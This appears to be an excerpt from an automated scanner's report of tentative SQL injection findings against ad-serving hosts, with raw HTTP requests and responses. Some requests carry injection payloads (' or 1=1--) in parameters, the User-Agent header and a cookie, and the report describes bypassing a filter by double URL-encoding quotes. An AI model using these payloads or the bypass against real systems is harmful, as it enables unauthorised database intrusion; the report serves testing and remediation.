'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUCuHqA1IVXQFhIjgDP1QN0ssCPz5nZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MjcxNzg0MTU_LGMsMzIxNjExLHBjLDc2Mjg5LGFjLDE1MTM1NCxvLE4wLVMwLGwsNTM5ODQscGNsaWNrLGh0dHA6Ly9hZC5hZnkxMS5uZXQvYWQ_Yz1QdnpCM3E1NHVVMjJ6N2lKcWdld1RqZ1RENHlKZjdtVVFrZVVGeFo3VWpmOGtWdWllTHpnZTlGalpnT0hmaTVsWENZbkIwYTVXamQxb1VtSUZDUXJjdjNnK0ZNR0w0dVRXSGtPQ2ZLMEExZz0hJjExMjg4MzkyOCcgb3IgMT0xLS0gPTEK&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=27178415?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=2115406896" s
...[SNIP]...

Request 2

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUTv4f.4AvYNPTpLkaenGPTHc02R4AAKsTJuN7gksypS.cOSoSGLwAAAEvZiQOFg--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:29 GMT; Path=/
Set-Cookie: UA=AAAAAQAUq2Z2XwOQwbbOy0ZJvKPLhf0xgaYDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FTwzIBgPf1fUglQwsIYwgCiwpDpECABl8Bzo-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2995
Date: Mon, 18 Apr 2011 01:05:29 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUu1LCr3inDmUp5YA3h7ihYNKcGZlnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MTczNDc5NzY0Nj8sYywzMjE2MTEscGMsNzYyODksYWMsMTUxMzU0LG8sTjAtUzAsbCw1Mzk4NCxwY2xpY2ssaHR0cDovL2FkLmFmeTExLm5ldC9hZD9jPVB2ekIzcTU0dVUyMno3aUpxZ2V3VGpnVEQ0eUpmN21VUWtlVUZ4WjdVamY4a1Z1aWVMemdlOUZqWmdPSGZpNWxYQ1luQjBhNVdqZDFvVW1JRkNRcmN2M2crRk1HTDR1VFdIa09DZkswQTFnPSEmMTEyODgzOTI4JyBvciAxPTItLSA9MQo-&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=1734797646?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=178
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/martindale.ll.stateresults.dart/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10164584'%20or%201%3d1--%20 and 10164584'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/martindale.ll.stateresults.dart/;sz=468x60;pa=;country=65;ord=717285;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers.htm?n=4294962592&dv=add|City^Birmingham&c=D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.1610164584'%20or%201%3d1--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 05:25:10 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 1527
X-XSS-Protection: 1; mode=block

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div id="srBorder" style="width: 583px; height: 50px; background-color: #FFFFFF; border-color: #
...[SNIP]...
<a id="srLink" href="http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBJ2zPtr-vTeLZKsH7lQfCq5GXDPuh3Y4CAAAAEAEgADgAWJvw25EmYMkGggEXY2EtcHViLTAwNDk0NDUyNzA3NjU5NTSyARJ3d3cubWFydGluZGFsZS5jb226AQk0Njh4NjBfYXPIAQnaAWNodHRwOi8vd3d3Lm1hcnRpbmRhbGUuY29tL2FsbC9jLWVuZ2xhbmQvYWxsLWxhd3llcnMuaHRtP249NDI5NDk2MjU5MiZkdj1hZGQlN0NDaXR5JTVFQmlybWluZ2hhbSZjPUTAAgLgAgDqAiQzMDc4L21hcnRpbmRhbGUubGwuc3RhdGVyZXN1bHRzLmRhcnT4AvDRHpAD0AWYA-ADqAMB0ASQTuAEAQ%26num%3D0%26sig%3DAGiWqtx6C5m65EkogUqVZwlEh59IShH2ag%26client%3Dca-pub-0049445270765954%26adurl%3Dhttp://www.mhur.com" style="color: #006699; text-decoration: none;" onmouseover="this.style.color='#817156';" onmouseout="this.style.color='#006699';" target="_blank"><font id="srTitle" style="font-family: Verdana; font-size: 11px; font-weight: bold; text-decoration: underline;">Showcase Your Peer Review Rating With Peer Review Rating Acknowledgements</font><br><font id="srText" style="font-family: Verdana; font-size: 10px; color: #333333; text-decoration: none;">LexisNexis Martindale-Hubbell knows the success of your firm depends on how your clients perceive your skills and ethical standards. Showcase expertise while giving back to the legal community.</font></a></div></div></body></html>

Request 2

GET /adi/martindale.ll.stateresults.dart/;sz=468x60;pa=;country=65;ord=717285;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers.htm?n=4294962592&dv=add|City^Birmingham&c=D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.1610164584'%20or%201%3d2--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 05:25:11 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 1498
X-XSS-Protection: 1; mode=block

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div id="srBorder" style="width: 583px; height: 50px; background-color: #FFFFFF; border-color: #
...[SNIP]...
<a id="srLink" href="http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBz-kEt7-vTeDjLIfPlQe25OSsDIug3Y4CAAAAEAEgADgAWKPg25EmYMkGggEXY2EtcHViLTAwNDk0NDUyNzA3NjU5NTSyARJ3d3cubWFydGluZGFsZS5jb226AQk0Njh4NjBfYXPIAQnaAWNodHRwOi8vd3d3Lm1hcnRpbmRhbGUuY29tL2FsbC9jLWVuZ2xhbmQvYWxsLWxhd3llcnMuaHRtP249NDI5NDk2MjU5MiZkdj1hZGQlN0NDaXR5JTVFQmlybWluZ2hhbSZjPUTAAgLgAgDqAiQzMDc4L21hcnRpbmRhbGUubGwuc3RhdGVyZXN1bHRzLmRhcnT4AvDRHpAD0AWYA-ADqAMB0ASQTuAEAQ%26num%3D0%26sig%3DAGiWqtwn2J4wUhTJGnC21zshwjSfjr51yg%26client%3Dca-pub-0049445270765954%26adurl%3Dhttp://www.martindale-hubbell.co.uk/premier-partners" style="color: #006699; text-decoration: none;" onmouseover="this.style.color='#817156';" onmouseout="this.style.color='#006699';" target="_blank"><font id="srTitle" style="font-family: Verdana; font-size: 11px; font-weight: bold; text-decoration: underline;">Climber. Leader. Lawyer.</font><br><font id="srText" style="font-family: Verdana; font-size: 10px; color: #333333; text-decoration: none;">Premier Partner Profiles: A new service from LexisNexis that provides insights into premier partners' current role, formative experiences, management style and industry experience.</font></a></div></div></body></html>

1.3. http://googleads.g.doubleclick.net/pagead/ads [id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the id cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u%2527

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 21-Apr-2011 09:13:25 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:58:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 12241
X-XSS-Protection: 1; mode=block
Expires: Thu, 21 Apr 2011 08:58:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtwCyXCJCKefmS-gRlsaaPdNT_ADpg&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u%2527%2527

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 21-Apr-2011 09:13:26 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:58:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 12459
X-XSS-Protection: 1; mode=block
Expires: Thu, 21 Apr 2011 08:58:26 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.4. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The lmt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lmt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345'&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:25:10 GMT
Server: cafe
Cache-Control: private
Content-Length: 12408
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtzQcv5MI4LKk3PKl3x-4gLOFh4J8Q&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345''&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:25:12 GMT
Server: cafe
Cache-Control: private
Content-Length: 12343
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.5. http://googleads.g.doubleclick.net/pagead/ads [output parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the output request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html%2527&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:21:52 GMT
Server: cafe
Cache-Control: private
Content-Length: 12179
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=3&sig=AGiWqtwZih6lgXFEFnRXARIl-Lzi2lc2HQ&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html%2527%2527&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
